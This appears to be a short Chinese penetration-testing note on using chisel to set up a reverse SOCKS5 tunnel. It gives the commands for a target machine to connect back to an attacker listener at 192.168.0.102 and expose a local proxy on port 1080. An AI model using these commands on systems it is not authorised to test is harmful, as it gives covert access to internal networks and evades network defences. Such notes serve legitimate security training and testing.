chisel
https://github.com/jpillora/chisel/releases
攻击机监听
>chisel.exe server -p 12138 --reverse

靶机执行
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346

靶机执行
>chisel.exe server -p 12346 --socks5

攻击机执行
>chisel.exe client 127.0.0.1:12345 socks

当隧道建立成功时,攻击机本地会启动1080端口

即可使用
最后更新于
这有帮助吗?